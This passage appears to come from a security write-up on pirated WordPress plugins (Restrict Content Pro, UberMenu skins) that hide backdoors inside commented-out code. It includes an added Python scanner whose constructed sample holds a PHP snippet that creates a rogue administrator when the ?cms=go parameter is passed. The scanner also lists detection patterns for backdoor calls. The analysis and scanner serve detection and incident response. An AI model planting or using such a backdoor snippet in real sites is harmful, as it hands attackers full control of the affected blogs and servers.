It’s easy to see the logic behind these two functions:
Then the attacker comes to the blog and loads it with the ?cms=jjoplmh parameter in the URL. As a result, a new admin user (named "wordpress", with a password the attacker already knows) is created. The attacker can now log into WordPress with admin permissions and do whatever they want with the blog, with the whole site (e.g. injecting a backdoor into some theme or plugin and then using it to upload malicious files to the server), with the server account (every site that shares the same account can now easily be compromised) and even with the whole server.

Let’s move on to the next set of "free" premium plugins.
The headers also mentioned the sites that sent those emails, so we only needed to check the plugins on those sites.

First we found this file: wp-content/restrict-content-pro/includes/sidebar.php - /8966576 (slightly trimmed):
This file is 72,847 bytes long and consists of a single line of code that looks like commented-out code from the option-tree plugin. However, if you inspect it more closely, you’ll notice that the following 243 bytes in the very middle of that line are not part of the comment (formatted for readability):

And here it is after decoding. Bingo!

But wait, this code only sends emails with the blog URL to the attacker.
Where is the code that creates the rogue user? Good, you noticed that.

The code was in the wp-content/restrict-content-pro/includes/class.php file - /8966599 (trailing comment trimmed):
Again, 90,390 bytes of commented-out code and one line of live code with a 288-byte payload in the middle, which is the missing part that created the rogue "wordpress" user. This time it needs the ?cms=go URL parameter.

OK, now we have both malicious functions, but how does WordPress know that it needs to call them? In the case of the SEOPressor plugin, the malicious functions were injected into a legitimate plugin file that WordPress loaded whenever it loaded the plugin.
Now we have two standalone files that contain no legitimate code at all. Moreover, they don’t belong to that plugin. The answer is that the attacker modified the main plugin file wp-content/restrict-content-pro/restrict-content-pro.php and added the following line of code there:

Then, with minor modifications, we found similar malicious files under wp-content/ubermenu-skins-flat:

( amFxcXNjaWdzQGdtYWlsLmNvbQ== ) (a base64-encoded Gmail address)
ubermenu-skins-flat/help/js/class.php - creates a rogue "wordpress" user with admin permissions.
ubermenu-skins-flat/ubermenu-skins-flat.php - includes the above two files.

... and was surprised to learn that he shouldn’t have trusted a site with such a cool domain name.

We checked that site and found that the plugins had been submitted there by a user named andrewp in June 2013.
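The pattern described above is easy to scan for once you know what to look for: a large plugin file that is almost entirely commented-out PHP, with a short live payload in the middle that reads a request parameter and then creates a user or mails out, plus an include line added to the plugin's main file so that WordPress loads the otherwise orphaned file. The scanner below is an added example, not code from the original post or from any of the plugins it discusses; the file paths, sizes and sample contents are constructed to mimic the shape the post describes, and the payload in the sample is inert text, not working PHP.

```python
"""Scan PHP plugin files for a live payload hidden inside a comment haystack
and for main plugin files that include such a payload file.
Added example; sample files below are constructed, not real plugin code."""
import re
from dataclasses import dataclass, field

# Request parameters used to arm the payload, e.g. $_GET['cms'].
TRIGGER = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*['\"](\w+)['\"]\s*\]")
# Calls worth flagging when they sit next to a trigger in a mostly-comment file.
DANGEROUS = re.compile(
    r"\b(wp_insert_user|wp_create_user|wp_mail|base64_decode|eval|gzinflate|str_rot13|mail)\s*\(")
# include/require lines; captures the quoted .php path.
INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*?['\"]([^'\"]+\.php)['\"]")


def strip_php_comments(src: str) -> str:
    """Return only the live (non-comment) part of a PHP source string.
    Quoted strings are copied verbatim so a '#' or '/*' inside them does not
    open a comment. A '?>' closing a line comment is not handled."""
    out, i, n = [], 0, len(src)
    while i < n:
        c, two = src[i], src[i:i + 2]
        if c in "'\"":                      # copy a quoted string, honouring backslash escapes
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1
            out.append(src[i:j + 1])
            i = j + 1
        elif two == "/*":                   # block comment: skip to the closing */
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif two == "//" or c == "#":       # line comment: skip to end of line
            j = src.find("\n", i)
            i = n if j == -1 else j
        else:
            out.append(c)
            i += 1
    return "".join(out)


@dataclass
class Finding:
    path: str
    size: int
    live_bytes: int
    single_line: bool
    triggers: list = field(default_factory=list)
    calls: list = field(default_factory=list)
    includes: list = field(default_factory=list)
    loads: list = field(default_factory=list)   # includes that resolve to a suspicious file

    @property
    def comment_ratio(self) -> float:
        return 1 - self.live_bytes / self.size if self.size else 0.0

    @property
    def suspicious(self) -> bool:
        # Armed payload (request parameter + dangerous call) inside a big file that is
        # either almost all comment or a single huge line, as in the post.
        armed = bool(self.triggers) and bool(self.calls)
        haystack = self.size > 4096 and (self.comment_ratio > 0.9 or self.single_line)
        return armed and haystack


def analyze(path: str, src: str) -> Finding:
    live = strip_php_comments(src)
    body = src.split("<?php", 1)[-1]
    return Finding(path=path, size=len(src), live_bytes=len(live.strip()),
                   single_line="\n" not in body.strip(),
                   triggers=sorted(set(TRIGGER.findall(live))),
                   calls=sorted(set(DANGEROUS.findall(live))),
                   includes=INCLUDE.findall(live))


def scan(files: dict) -> dict:
    """files maps path -> contents. Returns path -> Finding, with 'loads' filled in
    for any file whose include lines pull in a file judged suspicious."""
    findings = {p: analyze(p, s) for p, s in files.items()}
    bad = {f.path for f in findings.values() if f.suspicious}
    for f in findings.values():
        f.loads = [inc for inc in f.includes if any(b.endswith(inc.lstrip("./")) for b in bad)]
    return findings


def report(findings: dict) -> list:
    lines = []
    for f in findings.values():
        if f.suspicious:
            lines.append(f"BACKDOOR? {f.path}: {f.size} bytes, {f.live_bytes} live "
                         f"({f.comment_ratio:.1%} comment), triggers {f.triggers}, calls {f.calls}")
        if f.loads:
            lines.append(f"LOADER {f.path}: includes {f.loads}")
    return lines


# --- constructed samples shaped like the files in the post (hypothetical contents) ---
FILLER = "".join("function ot_sidebar_%d() { return get_option('ot_%d'); } " % (i, i) for i in range(250))
PAYLOAD = ("if (isset($_GET['cms']) && $_GET['cms'] == 'go') { wp_insert_user(array("
           "'user_login' => 'wordpress', 'user_pass' => 'p', 'role' => 'administrator')); } ")
SAMPLES = {
    "wp-content/restrict-content-pro/includes/class.php":
        "<?php /* " + FILLER + " */ " + PAYLOAD + "/* " + FILLER + " */",
    "wp-content/restrict-content-pro/restrict-content-pro.php":
        "<?php\n// main plugin file\nrequire_once dirname(__FILE__) . '/includes/class.php';\n"
        "function rcp_init() { add_action('init', 'rcp_setup'); }\n",
    "wp-content/restrict-content-pro/includes/sidebar-legit.php":
        "<?php\n/* Legitimate helper: reads a request parameter in ordinary code. */\n"
        "function rcp_tab() { return isset($_GET['tab']) ? sanitize_key($_GET['tab']) : 'main'; }\n",
}

if __name__ == "__main__":
    for line in report(scan(SAMPLES)):
        print(line)
```

Run against a real wp-content tree by reading each .php file into the dict; the legitimate helper above shows why a request parameter alone is not a signal, the combination with a user-creation or mail call inside a file that is over 90% comment is. Two things the scanner cannot do, and which you still need in an incident: diff the plugin against a pristine copy from the vendor to find the added include line regardless of how it is written, and check wp_users for administrators you did not create.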
In total, he submitted five plugins, and all of them had those malicious backdoors.

Restrict Content Pro WordPress Plugin V1.0.

... and checked them.
It didn’t take long to find a few "patched" plugins submitted in February and March of 2014 by the site admin (not some third-party user):

Go - Responsive Pricing and Compare Tables (gopricing)
FormCraft
Custom Scrollbar WordPress
Theia Sticky Sidebar
GravityForms